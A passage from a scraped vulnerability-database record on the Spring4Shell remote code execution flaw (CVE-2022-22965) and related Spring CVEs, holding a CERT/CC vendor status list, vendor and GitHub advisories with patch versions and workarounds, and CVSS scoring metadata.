Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&amp;oscode=naa&amp;productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&amp;posno=1&amp;q=CVE-2022-22965&amp;source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&amp;rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&amp;solutionid=sk178605&amp;src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&amp;id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&amp;sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-08-27T05:12:43", "description": "Vmware Spring Framework is an open source Java, JavaEE application framework from Vmware, Inc. The framework helps developers build high-quality applications.Vmware Spring Framework has a security vulnerability that can be exploited by attackers to bypass Spring Framework access restrictions through log injection to modify data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-10T00:00:00", "type": "cnvd", "title": "Vmware Spring Framework has an unspecified vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060"], "modified": "2022-02-12T00:00:00", "id": "CNVD-2022-09799", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-09799", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "github": [{"lastseen": "2023-06-14T15:09:25", "description": "In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-03T00:01:00", "type": "github", "title": "Allocation of Resources Without Limits or Throttling in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-03-28T22:26:11", "id": "GHSA-558X-2XJG-6232", "href": "https://github.com/advisories/GHSA-558x-2xjg-6232", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T15:15:33", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-12T23:04:06", "type": "github", "title": "Log entry injection in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2023-02-03T05:04:29", "id": "GHSA-6GF2-PVQW-37PH", "href": "https://github.com/advisories/GHSA-6gf2-pvqw-37ph", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-06-14T15:09:25", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "github", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-31T05:04:23", "id": "GHSA-36P3-WJMG-H94X", "href": "https://github.com/advisories/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T06:29:36", "description": "Spring Expression is vulnerable to denial of service. The vulnerability exists due to the creation of large array in a SpEL and sending meaningless error messages to the user which allows an attacker to send crafted SpEL expressions that leads to an out ouf bound error causing an application crash. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-07T12:06:55", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-06-22T15:16:24", "id": "VERACODE:35014", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35014/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T05:45:26", "description": "spring-beans is vulnerable to remote code execution. Using Spring Parameter Binding with non-basic parameter types, such as POJOs, allows an unauthenticated attacker to execute arbitrary code on the target system by writing or uploading arbitrary files (e.g .jsp files) to a location that can be loaded by the application server. Initial analysis at time of writing shows that exploitation of the vulnerability is only possible with JRE 9 and above, and Apache Tomcat 9 and above, and that the vulnerability requires the usage of Spring parameter binding with non-basic parameter types such as POJOs.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:56:39", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 